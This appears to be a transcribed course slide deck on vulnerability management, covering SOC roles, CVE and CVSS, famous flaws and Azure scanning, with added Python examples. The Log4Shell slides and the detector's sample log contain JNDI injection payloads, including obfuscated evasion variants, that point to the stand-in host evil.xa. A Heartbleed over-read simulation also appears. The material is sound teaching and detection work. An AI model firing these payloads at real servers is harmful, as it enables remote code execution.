Vulnerability Management Slides

The document discusses various aspects of vulnerability management in cybersecurity, including the roles of Security Operations Centers (SOCs), threat intelligence, and incident response processes. It highlights the importance of understanding threats, vulnerabilities, and risks, as well as the significance of tools like EDR, XDR, and SIEM in managing security incidents. Additionally, it covers common vulnerabilities, such as zero-day exploits and misconfigurations, and emphasizes the need for proactive threat hunting and collaboration between security teams.


Vulnerability Management

by Christopher Nett
Connect with me! Get discounted courses, updates and industry insights:

• My Website
• Azure Newsletter
• Cybersecurity Newsletter

Social Media: LinkedIn, X, Bluesky, Threads

Christopher Nett
It is a complex world we live in

The attack surface spans:

• Networks
• IoT
• ICS & OT
• Cloud
• Mobile Devices
• People
• Servers
• Endpoints
Cyber Security Challenges

• Lack of security people
• Many disconnected products
• Noisy alerts and false positives
• Lack of automation
• More sophisticated threats
• Overwhelming access to data
• Evolving regulatory landscape
• A lot of alerts are never really investigated
What is a Security Operations Center (SOC)?

Core functions of a SOC:

• Threat Intelligence
• Threat Hunting
• Log Management
• Reducing Attack Surface
• SOC Analysts
• Threat Detection
• Root cause investigation
• Recovery and Remediation
• Incident Response

Source: What is a security operations center (SOC)? | Microsoft Security
SOC Model

Tier 3 (5% of alerts)
• Proactive Threat Hunting
• Advanced Forensics

Tier 2 (25% of alerts)
• Advanced malware
• Hard tasks

Tier 1 (70% of alerts)
• Commodity malware
• Easier tasks that cannot or should not be automated

Automation
• Commodity malware
• Repetitive tasks
• Mimics the steps an analyst would take in easy cases

Source: What is a security operations center (SOC)? | Microsoft Security
Cyber Security Incident Response Process

NIST 800-61 (Computer Security Incident Handling Guide) describes four phases:

1) Preparation
2) Detection & Analysis
3) Containment, Eradication & Recovery
4) Post-Incident Activity

Source: Computer Security Incident Handling Guide (nist.gov)


EDR, XDR, SIEM & SOAR

• EDR: Endpoint Detection and Response. Behavior monitoring for endpoints. Microsoft product: Defender for Endpoint
• XDR: Extended Detection and Response. Behavior monitoring beyond the endpoint. Microsoft products: Defender XDR, Defender for Cloud
• SIEM: Security Information & Event Management. Centralized collection, correlation and analysis of logs. Microsoft product: Sentinel
• SOAR: Security Orchestration, Automation & Response. Automates incident response procedures. Microsoft products: Sentinel + Azure Logic Apps

Source: What is a security operations center (SOC)? | Microsoft Security
Blue and Red Teaming

Blue Team (defensive)
• Security Monitoring
• Incident Response
• Forensics
• Threat Hunting

Red Team (offensive)
• Vulnerability Assessments
• Penetration Testing
• Social Engineering
• Simulate adversary TTPs
Purple Teaming

• Blue and Red collaborate to improve security posture
• Collaborative simulation of adversary TTPs
• Drastic upskilling of both teams
What is a Threat?

Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Source: Security and Privacy Controls for Information Systems and Organizations (nist.gov)
Intelligence, Threat Intelligence and CTI

From the general to the specific:

• Intelligence
• Threat Intelligence
• Cyber Threat Intelligence

Source: What is Cyber Threat Intelligence? (cisecurity.org)


Cyber Threat Intelligence (CTI)

What is Cyber Threat Intelligence?


“Cyber Threat intelligence is knowledge about adversaries and their motivations, intentions, and methods that is collected, analyzed, and disseminated in ways that help security and business staff at all levels protect critical assets of the enterprise.”

Enabling Threat-Informed Defense

Source: What is Cyber Threat Intelligence? (cisecurity.org)


Threat, Vulnerability & Risk

A Threat Actor initiates a Threat. The Threat exploits a Vulnerability, causing an Adverse Impact. Together these produce Risk.

Risk is a function of Impact and Likelihood.

Source: Security and Privacy Controls for Information Systems and Organizations (nist.gov)
Threat-Informed Defense

• What is the mission of my organization?
• What threat actors are interested in my organization's industry?
• What are the motivations of those threat actors?
• What TTPs are those threat actors using?
• How can I detect and protect my organization against those TTPs?
Tactics, Techniques and Procedures

• Tactics: The high-level description of the behavior and strategy of a threat actor. Example: Reconnaissance
• Techniques: The non-specific guidelines and intermediate methods that describe how a tactic can be realized. Example: Scanning
• Procedures: The sequence of actions performed using a technique to execute on an attack tactic. A procedure is a detailed description of the activities. Example: Vulnerability Scanning

Source: What Are TTPs? Tactics, Techniques & Procedures Explained | Splunk
IOCs and IOAs

• IOC: An Indicator of Compromise (IOC) is evidence on a system that indicates that the security of the network has been breached.
• IOA: Indicators of Attack (IOA) focus on detecting the intent of what an attacker is trying to accomplish and its behavior, regardless of the malware or exploit used in an attack.

IOCs: File Hashes, Domains, URLs
IOAs: Intent & Behavior

Source: IOA vs IOC: Understanding the Differences - CrowdStrike


Pyramid of Pain

Indicator types from the top of the pyramid down, with the level of difficulty each one causes the adversary when it is detected and denied:

TTPs                     Tough!
Tools                    Challenging
Network/Host Artifacts   Annoying
Domain Names             Simple
IP Addresses             Easy
Hash Values              Trivial

Source: Enterprise Detection & Response: The Pyramid of Pain (detect-respond.blogspot.com)
What is Threat Hunting?

Threat Hunting is the practice of proactively searching for cyber threats that are lurking undetected in your environment.

There are two Threat Hunting models:
1) Intelligence-based Hunting: Leverage IOCs, hash values, IP addresses, domain names or host artifacts
2) Hypothesis-based Hunting: Hunt based on IOAs and TTPs of adversaries

Source: What is threat hunting? | IBM


CTI Sources

• Enterprise
• OSINT
• Social Media
What is Zero Trust?

• Zero Trust is a security strategy
• It is not a product or a service

There are 3 core principles of Zero Trust:
1) Verify explicitly
2) Use least-privilege access
3) Assume breach

Source: Zero Trust Model - Modern Security Architecture | Microsoft Security
The Microsoft Security Cosmos

[Figure: Microsoft Sentinel and Copilot for Security sit on top, across Multi-cloud and On-Premises. Microsoft Defender XDR covers Identities, Endpoints, Apps, Email, Docs and Cloud apps. Defender for Cloud covers SQL Server, Containers, VMs, Network traffic, Industrial IoT and PaaS services.]

Source: Microsoft Cybersecurity Reference Architectures (MCRA) | Microsoft Learn
Defending Across Attack Chains

[Figure: a typical attack chain and the Microsoft product covering each stage]

Attack chain: Phishing Mail -> Open attachment / Click URL -> Installation -> Exploitation -> Command and Control -> Compromised Account -> Lateral Movement -> Compromised Privileged Account -> Compromised Domain -> Data Exfiltration. A parallel entry path: Brute Force or Steal Credentials -> Compromised Account.

Coverage: Defender for Office 365 (mail, attachments and URLs), Defender for Endpoint (installation, exploitation, command and control), Defender for Identity (account compromise and lateral movement), Defender for Cloud Apps (data exfiltration), Entra ID Protection (brute force and stolen credentials). Defender XDR, Sentinel and Copilot for Security span the whole chain.

Source: Microsoft Cybersecurity Reference Architectures (MCRA) | Microsoft Learn
Cloud Computing Properties

The five essential characteristics of cloud computing according to NIST:

• On-demand self-service
• Broad network access
• Resource pooling
• Rapid elasticity
• Measured service

Source: nistspecialpublication800-145.pdf


Public, Private, Multi & Hybrid Cloud

[Figure: Public Cloud: Microsoft Azure, Amazon AWS, Google GCP. Using more than one public cloud is Multi Cloud. Private Cloud: Azure Stack, AWS Outposts, Google Anthos. Combining public and private cloud is Hybrid Cloud.]

Source: nistspecialpublication800-145.pdf


Azure Global Backbone

• 60+ Azure regions
• 130k+ miles of fiber + subsea cables
• 172+ Network Edge sites
• 500+ network partners
• 20k+ peering connections

Source: Global Network – Backbone Networking Infrastructure | Microsoft Azure
Shared Responsibility in Azure

Who is responsible for each layer, by deployment model (cell values as in the cited Microsoft model; the original slide showed them as shading):

Responsibility                          On-prem     IaaS        PaaS        SaaS
Information and Data                    Customer    Customer    Customer    Customer
Devices (Mobile and PCs)                Customer    Customer    Customer    Customer
Accounts and Identities                 Customer    Customer    Customer    Customer
Identity and Directory Infrastructure   Customer    Customer    Shared      Shared
Applications                            Customer    Customer    Shared      Microsoft
Network Controls                        Customer    Customer    Shared      Microsoft
Operating System                        Customer    Customer    Microsoft   Microsoft
Physical Hosts                          Customer    Microsoft   Microsoft   Microsoft
Physical Network                        Customer    Microsoft   Microsoft   Microsoft
Physical Datacenter                     Customer    Microsoft   Microsoft   Microsoft

Whatever the model, the customer always owns its data, devices, and accounts and identities.

Source: Shared responsibility in the cloud - Microsoft Azure | Microsoft Learn
Azure Subscription Types

Free
• Free credits for 30 days
• Some services are free for 12 months

Student
• Free credits for 12 months
• No credit card required

Pay As You Go
• Pay for what you use
• Credit card required

Enterprise Agreement
• One consumption agreement for all Azure services
• Various different billing models

Source: Create Your Azure Free Account Today | Microsoft Azure
Entra ID Tenants and Azure Subscriptions

[Figure: identities live in the Entra ID tenant; one or more Azure subscriptions trust that tenant, and its identities access the resources in them]

Source: Microsoft Entra ID documentation - Microsoft Entra ID | Microsoft Learn
Azure Resource Hierarchy

Management Groups

Subscriptions

Resource Groups

Resources
What is a Vulnerability?

Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.

Source: vulnerability - Glossary | CSRC (nist.gov)


Common Vulnerabilities and Exposures (CVE)

• Led by MITRE as the CVE Program; CVE Numbering Authorities (CNAs) assign the IDs
• Every publicly disclosed vulnerability is assigned a CVE ID in the form CVE-yyyy-nnnn, where nnnn is a sequence number of four or more digits
• A CVE record includes a vulnerability description and references such as data sources and the official vendor announcement
Common Vulnerabilities and Exposures (CVE)

• CVE-2009-2935
• Google V8, as used in Google Chrome before 2.0.172.43, allows
remote attackers to bypass intended restrictions on reading memory,
and possibly obtain sensitive information or execute arbitrary code in
the Chrome sandbox, via crafted JavaScript.
• CVSS Version 2.0 Score: 10.0

Source: https://nvd.nist.gov/vuln/detail/CVE-2009-2935


Common Vulnerability Scoring System (CVSS)

• Evaluates the severity of a vulnerability on a scale from 0.0 to 10.0
• Considers the impact on the CIA triad but also other factors such as attack vector, attack complexity, privileges required and user interaction

Qualitative severity ratings:

CVSSv2                       CVSSv3
Score        Severity        Score        Severity
7.0 – 10.0   High            9.0 – 10.0   Critical
4.0 – 6.9    Medium          7.0 – 8.9    High
0.0 – 3.9    Low             4.0 – 6.9    Medium
                             0.1 – 3.9    Low
                             0.0          None

Source: https://nvd.nist.gov/vuln-metrics/cvss
Where can Vulnerabilities occur?

An adversary can target any layer of the stack:

• Applications
• Middleware
• Operating System
• Hardware
Zero Days

[Timeline: Discovery -> Exploitation -> Disclosure -> Mitigation. Between discovery and public disclosure the flaw is a Zero Day Vulnerability; from disclosure on it is a Public Vulnerability.]
Zero Days

• Zero Day researchers
• Nation states leverage Zero Days extensively
• There is a market for Zero Days
• Zero Days are heavily used in big campaigns, e.g. Stuxnet (4 Zero Days)
Outdated Software

• Outdated software is still one of the most common vulnerabilities
• Can be a combination of various types of vulnerabilities
• Systems stay vulnerable even though a patch is available

[Figure: Threat Actor launches an Exploit against an unpatched Windows Server 2008]
Cloud Misconfigurations

• Usually not a CVE but a critical misconfiguration leading to a vulnerability that can be exploited by adversaries

[Figure: Threat Actor reads from and writes to a public (Read/Write) AWS S3 Bucket and a public Azure Storage Account]
Remote Code Execution

• RCE is when an adversary can execute code of their choosing on a system remotely
• For an unauthenticated RCE the only requirement is network connectivity to the vulnerable system; no prior access or credentials are needed

[Figure: Threat Actor achieves Remote Code Execution against Windows Servers in an On-Premises Datacenter]
Overview

One example per layer, each covered in the following slides:

• Applications: Heartbleed
• Middleware: Log4Shell
• Operating System: EternalBlue
• Hardware: Meltdown
Heartbleed

• CVE-2014-0160
• CVSS 3.1 Score: 7.5
• The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets.
• This allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

Source: https://nvd.nist.gov/vuln/detail/cve-2014-0160


Heartbleed

[Figure: how the heartbeat over-read leaks memory]

Normal heartbeat:
Bob -> Server: "Server, send me this 5 letter word if you are there: Alice"
Server -> Bob: "Alice"

Heartbleed:
Bob -> Server: "Server, send me this 500 letter word if you are there: Alice"
Server -> Bob: "Alice. User Bob has connected. User Bob wants 5 letters: Alice. Server master key is 216351235."

The server trusts the claimed length (500) instead of the actual payload length (5) and copies the following bytes of process memory into the reply.
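The exchange above in miniature, as an added example that is neither from the slides nor from OpenSSL. It models process memory as a byte array and lays a heartbeat request (RFC 6520 layout: type, 2-byte payload_length, payload, padding) directly in front of constructed secrets, then runs the pre-1.0.1g behaviour beside the 1.0.1g check. The secrets, the "Bob"/"Alice" strings and the key value are constructed.

```python
"""Heartbleed in miniature (added example, not from the slides or OpenSSL).

A heartbeat record is type(1) | payload_length(2, big-endian) | payload |
padding (RFC 6520). The vulnerable handler trusts payload_length; the fixed
one checks it against the length of the record actually received.
"""
import struct
from typing import Optional, Tuple

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING = 16  # RFC 6520 minimum padding length


def build_heartbeat(claimed_length: int, payload: bytes) -> bytes:
    """Build a request whose length field may lie about the payload size."""
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * PADDING


def vulnerable_handler(memory: bytearray, record_offset: int) -> bytes:
    """OpenSSL < 1.0.1g behaviour: copies payload_length bytes starting at
    the payload without checking that the record holds that many."""
    _, payload_length = struct.unpack_from("!BH", memory, record_offset)
    start = record_offset + 3
    # Over-read: the slice runs past the request into adjacent process memory.
    echoed = bytes(memory[start:start + payload_length])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed


def fixed_handler(memory: bytearray, record_offset: int, record_length: int) -> Optional[bytes]:
    """1.0.1g fix: drop the record if 1 + 2 + payload_length + 16 exceeds it."""
    _, payload_length = struct.unpack_from("!BH", memory, record_offset)
    if 1 + 2 + payload_length + PADDING > record_length:
        return None  # silently discarded, as the patched code does
    start = record_offset + 3
    echoed = bytes(memory[start:start + payload_length])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_length) + echoed


def simulate(claimed_length: int, payload: bytes) -> Tuple[bytes, Optional[bytes]]:
    """Place the request next to constructed secrets and run both handlers."""
    request = build_heartbeat(claimed_length, payload)
    # Constructed process memory: the request followed by data the server
    # never meant to send (session state and key material).
    secrets = (b"User Bob has connected. User Bob wants 5 letters: Alice. "
               b"Server master key is 216351235. "
               b"-----BEGIN RSA PRIVATE KEY----- (constructed) -----END RSA PRIVATE KEY-----")
    memory = bytearray(request + secrets)
    return vulnerable_handler(memory, 0), fixed_handler(memory, 0, len(request))


if __name__ == "__main__":
    honest, _ = simulate(5, b"Alice")
    leak, dropped = simulate(500, b"Alice")
    print("honest reply :", honest[3:])
    print("leaked reply :", leak[3:])
    print("fixed server :", dropped)
```

The fix is a single bounds check, which is the usual shape of a memory-safety patch: the data the attacker controls (the length field) must be validated against what was actually received before it drives a copy.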
Log4Shell

• CVE-2021-44228
• Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
• An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
• CVSSv3 Score: 10.0

Source: https://nvd.nist.gov/vuln/detail/CVE-2021-44228


Log4Shell

[Figure: the Log4Shell attack flow between Adversary, Vulnerable Server (http://victim.xa), Vulnerable Log4j and Malicious LDAP Server (ldap://evil.xa)]

1) The adversary inserts a JNDI lookup in a header field that is likely to be logged:

GET /test HTTP/1.1
Host: victim.xa
User-Agent: ${jndi:ldap://evil.xa/x}

2) The vulnerable server passes the string to Log4j for logging.
3) Log4j interpolates the string and queries the malicious LDAP server (ldap://evil.xa/x).
4) The malicious LDAP server responds with directory information that contains the malicious Java class.
5) Java downloads the malicious Java class and executes it:

public class Malicious implements Serializable {
    static {
        <malicious Java code>
    }
}
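Step 1 is also where defenders get their first look at the attack: the lookup string lands in the access log whether or not the exploit succeeds. The detector below is an added example, not from the slides or from any Log4j project code. It flags the plain ${jndi:...} form and the common evasions that assemble the word "jndi" from nested lookups (${lower:j}, ${::-j}) by resolving those inner lookups the way Log4j would before matching. The log lines are constructed.

```python
"""Detecting Log4Shell lookup strings in request logs (added example).

Not from the slides. Normalizes the nested-lookup evasions seen in the
wild (${lower:x}, ${upper:x}, ${anything:-x}) and then matches the
${jndi:<protocol>: pattern. Log lines below are constructed.
"""
import re
from typing import List, Tuple

# Inner lookups used to spell "jndi" without the literal substring.
# ${lower:X} / ${upper:X} -> X ; ${...:-X} (default-value syntax) -> X
_CASE = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested lookups until nothing changes (bounded to stop loops)."""
    for _ in range(20):
        new = _CASE.sub(lambda m: m.group(1), s)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(line: str) -> List[str]:
    """Return the protocol (ldap, rmi, dns, ...) of every JNDI lookup found."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line number, protocols) for every line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        protos = find_jndi_lookups(line)
        if protos:
            hits.append((n, protos))
    return hits


# Constructed access-log lines: lines 1 and 5 are benign, 2 to 4 carry lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /test HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - "GET /test HTTP/1.1" 200 "${jndi:ldap://evil.xa/x}"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:rmi://evil.xa/y}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.xa/z}"',
    '10.0.0.2 - - "GET /price?id=${amount} HTTP/1.1" 200 "curl/8.0"',
]

if __name__ == "__main__":
    for n, protos in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {', '.join(protos)}")
```

A hit on an inbound request proves attempted exploitation, not success; pair it with outbound LDAP/RMI connection attempts from the application host (the step 3 traffic in the figure) to tell the two apart. Line 5 shows why matching on "${" alone is too noisy.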
MS17-010 / EternalBlue

• Exploit for a then-unknown (zero day) SMBv1 vulnerability, developed by the NSA
• The Shadow Brokers stole the exploit from the NSA
• After the NSA discovered the theft, it informed Microsoft, and a patch (MS17-010) was released
• The Shadow Brokers tried to sell the exploit but eventually made it public
• EternalBlue was leveraged in WannaCry and NotPetya

Source: https://nvd.nist.gov/vuln/detail/cve-2017-0144


MS17-010 / EternalBlue

• CVE-2017-0144
• CVSS 3.1 Score: 8.1
• The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."

Source: https://nvd.nist.gov/vuln/detail/cve-2017-0144


EternalBlue / MS17-010

[Figure: the Adversary sends a crafted SMBv1 payload over TCP port 445 that triggers the buffer overflow (RCE); a reverse shell opens back to the adversary]
Meltdown

• CVE-2017-5754
• CVSS 3.1 Score: 5.6
• Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.
• Affects Intel x86 microprocessors, IBM POWER processors, and some ARM-based microprocessors

Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5754


Meltdown

How reading from memory should work:
1) Does the application have permission to read from this address?
2) Read from memory

How Intel processors "optimized" performance:
1) Read from memory (speculatively)
2) Does the application have permission to read from this address?

By masking exceptions and using a side channel that times how long it takes to read from memory, Meltdown can steal secret data.

Source: https://spectrum.ieee.org/how-the-spectre-and-meltdown-hacks-really-worked


What is Vulnerability Management?

• Identification: Detecting vulnerabilities in IT assets like applications, systems, and networks through automated scanning and manual testing methods.
• Evaluation: Analyzing identified vulnerabilities to assess their nature, exploitability, and potential impact on the organization.
• Prioritization: Ranking vulnerabilities based on their criticality and the urgency of action needed, considering factors such as threat environment and asset value.
• Remediation: Addressing vulnerabilities by applying patches, configuring security settings, or employing other mitigation strategies to reduce risk.
• Reporting: Documenting the vulnerability management process, outcomes, and unresolved issues for internal stakeholders and compliance with external regulations.
Vulnerability Identification

• Scanning Tools: Utilize automated software tools to scan for vulnerabilities across all digital assets
  • Agent-based
  • Agent-less
• Manual Testing: Conduct expert-driven assessments and penetration testing to find security gaps missed by automated tools
• Inventory Management: Maintain an updated inventory of all organizational assets to ensure comprehensive vulnerability detection
Vulnerability Evaluation

• Severity Assessment: Assess vulnerabilities based on the potential harm they could cause if exploited
  • CVSS
  • Asset Criticality
• Context Analysis: Consider the specific context of the asset, such as its role in the organization and exposure level
• Vulnerability Research: Stay informed about the latest vulnerability disclosures and industry advisories
Vulnerability Prioritization

• Risk-Based Ranking: Prioritize fixing vulnerabilities based on the risk they pose to the most critical assets
• Compliance Requirements: Factor in legal and compliance implications to prioritize vulnerabilities
• Resource Availability: Align vulnerability remediation with available security resources and operational impact
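Evaluation and prioritization are where a raw CVSS list becomes a work queue. The following is an added example, not from the slides or any vendor tool: it folds the evaluation inputs named above (CVSS score, asset criticality, exposure as context) plus whether an exploit is publicly known into one rank, and derives a remediation deadline from the rank band. The weighting, the SLA bands and the findings themselves are illustrative assumptions; the CVE IDs are the ones discussed earlier in this deck, placed on invented assets.

```python
"""Risk-based vulnerability prioritization (added example, not from the slides).

Combines CVSS, asset criticality, internet exposure and exploit
availability into a 0..100 rank. Weights, SLA bands and findings are
illustrative assumptions, not a standard.
"""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    cve: str
    asset: str
    cvss: float            # CVSS v3 base score, 0.0 .. 10.0
    criticality: int       # asset criticality, 1 (low) .. 5 (crown jewel)
    internet_facing: bool  # exposure / context
    exploit_known: bool    # e.g. public PoC or listed in CISA KEV
    patch_available: bool


def risk_score(f: Finding) -> float:
    """Assumed weighting: criticality scales CVSS, internet exposure adds
    50%, a known exploit doubles it (likelihood). The raw maximum
    10 * 1.0 * 1.5 * 2 = 30 is normalized to 100."""
    score = f.cvss * (f.criticality / 5)
    if f.internet_facing:
        score *= 1.5
    if f.exploit_known:
        score *= 2.0
    return round(min(score / 0.30, 100.0), 1)


def sla_days(score: float) -> int:
    """Assumed remediation deadline by rank band."""
    if score >= 75:
        return 7
    if score >= 40:
        return 30
    if score >= 15:
        return 90
    return 180


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Highest risk first; among equals, patchable items before those
    needing a workaround; CVE ID as a stable final tie-break."""
    return sorted(findings, key=lambda f: (-risk_score(f), not f.patch_available, f.cve))


# Constructed findings on invented assets. Note the two CVSS 10.0 items:
# context pushes the isolated kiosk below a CVSS 8.1 on a shared server.
FINDINGS = [
    Finding("CVE-2021-44228", "billing-api", 10.0, 5, True, True, True),
    Finding("CVE-2017-0144", "file-server-legacy", 8.1, 3, False, True, True),
    Finding("CVE-2014-0160", "intranet-wiki", 7.5, 2, False, False, True),
    Finding("CVE-2017-5754", "dev-laptop", 5.6, 1, False, False, True),
    Finding("CVE-2009-2935", "kiosk-browser", 10.0, 1, False, False, False),
]

if __name__ == "__main__":
    print(f"{'CVE':16} {'asset':20} {'CVSS':>5} {'risk':>6} {'SLA':>4}")
    for f in prioritize(FINDINGS):
        r = risk_score(f)
        print(f"{f.cve:16} {f.asset:20} {f.cvss:5.1f} {r:6.1f} {sla_days(r):3d}d")
```

Whatever weighting an organization settles on, the point the slides make holds: the ranking must be computed from asset context and threat data, not read straight off the CVSS column, and the weights should be written down so that the reporting stage can explain why an item sat in a given band.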
Vulnerability Remediation

• Patch Management: Deploy security patches promptly to mitigate identified vulnerabilities
• Configuration Changes: Adjust settings and configurations to harden systems against attack
• Mitigation Techniques: Implement interim protective measures when immediate remediation is not possible
Reporting

• Documentation: Record details of the vulnerability management efforts, including identified, mitigated, and outstanding vulnerabilities
• Review Meetings: Regularly review the vulnerability management process with stakeholders to align on progress and strategy
• Compliance Auditing: Prepare reports for auditing purposes to ensure compliance with industry regulations and standards
Vulnerability Management Architecture

[Figure: agent-less vulnerability scanners scan Cloud Resources; agent-based vulnerability scanners scan On-premises Resources and Employee Devices. All scan results feed a central Evaluate & Prioritize step, which produces Reporting for stakeholders and Remediation tasks for IT Operations.]


Scenario

• Imagine you are the CISO at EnergyCorp, one of the largest energy providers in your country.
• EnergyCorp has recently experienced a series of cyber attacks that exposed vulnerabilities in its IT infrastructure, affecting both its operations and reputation.
• The company realized the need to establish a robust vulnerability management program to identify, assess, prioritize, and remediate vulnerabilities before they could be exploited by malicious actors.
Scenario

The main challenges faced by EnergyCorp included:

• Lack of visibility into the organization's digital assets and their associated vulnerabilities.
• Inefficient vulnerability assessment processes that were largely manual and time-consuming.
• Prioritization of vulnerabilities not aligned with the business impact, leading to delayed remediation of critical vulnerabilities.
• Limited collaboration between IT, security, and operational teams.
• Inadequate reporting and tracking mechanisms for vulnerability management efforts.
Steps

1. Define Strategic Goals
2. Identify Vulnerability Management Requirements
3. Establish Processes and Tools
4. Establish Vulnerability Management Architecture
5. Continuous Improvement
Define Strategic Goals

• Ensure Business Continuity: Minimize downtime due to security breaches.
• Protect Sensitive Data: Safeguard critical business and customer data from unauthorized access.
• Compliance with Regulations: Ensure adherence to industry standards and regulations such as GDPR, HIPAA, etc.
• Reputation Management: Maintain customer trust by proving resilience to cyber threats.
• Risk Management: Identify and manage security risks to an acceptable level.
Identify Vulnerability Management Requirements

• Asset Discovery: Automatically catalog digital assets and their configurations.
• Vulnerability Scanning: Utilize automated tools to scan for known vulnerabilities.
• Risk Assessment: Develop criteria for evaluating the risk level of identified vulnerabilities.
• Patch Management: Implement procedures for timely application of security patches.
• Threat Intelligence Integration: Leverage external threat data to anticipate emerging risks.
Establish Processes and Tools

• Selection of Tools: Choose comprehensive vulnerability management tools for automation.
• Process Development: Create standardized processes for vulnerability detection, assessment, and remediation.
• Roles and Responsibilities: Define clear roles for the IT, security, and operations teams regarding vulnerability management.
• Training: Provide training for relevant staff on vulnerability management processes and tools.
Establish Vulnerability Management Architecture

• Centralized Dashboard: Implement a centralized management dashboard for visibility and control.
• Integration with Existing Systems: Ensure new tools integrate well with the existing IT infrastructure.
• Scalability: Design the architecture to handle an increasing number of assets and vulnerabilities.
• Redundancy and Failover: Establish systems that can take over in case of failure to ensure continuous operation.
Continuous Improvement

• Feedback Loops: Implement feedback mechanisms to learn from past incidents and improve processes.
• Regular Audits and Assessments: Schedule regular security audits to test the effectiveness of the vulnerability management program.
• Update and Review Policies: Continually review and update vulnerability management policies to adapt to new threats.
• Performance Metrics: Establish KPIs for measuring the effectiveness of the vulnerability management process.
• Stakeholder Engagement: Keep stakeholders informed about the status of vulnerability management efforts and involve them in decision-making.
Scenario

• EnergyCorp wants to leverage Azure native security tools to enable their vulnerability management program
• You are tasked with:
  • Ensuring that all Azure assets are scanned for vulnerabilities
  • Conducting vulnerability scanning both agent-based and agentless
  • Creating a vulnerability report for the Azure environment
Agent-based Vulnerability Scanning for VMs

• Requires a Defender for Servers plan on the Azure subscription (enabled through Defender for Cloud)
• Available for Azure VMs and Arc-enabled machines

[Figure: a VM covered by the Defender for Servers plan runs the vulnerability scan; Defender for Cloud displays the CVEs found]

Note: the integrated Qualys scanner referenced in the source below has since been retired by Microsoft (May 2024); the agent-based assessment in Defender for Servers is now provided by Microsoft Defender Vulnerability Management.

Source: Enable vulnerability scanning with the integrated Qualys scanner - Microsoft Defender for Cloud | Microsoft Learn
Agentless Vulnerability Scanning for VMs

• Requires Defender CSPM or Defender for Servers Plan 2
• Available for Azure, AWS and GCP
• Zero performance impact on the scanned VM

[Figure: Defender for Cloud takes a disk snapshot of the VM, scans it in an isolated scanning environment separate from the customer environment, and displays the CVEs found]

Source: Learn about agentless scanning for VMs - Microsoft Defender for Cloud | Microsoft Learn
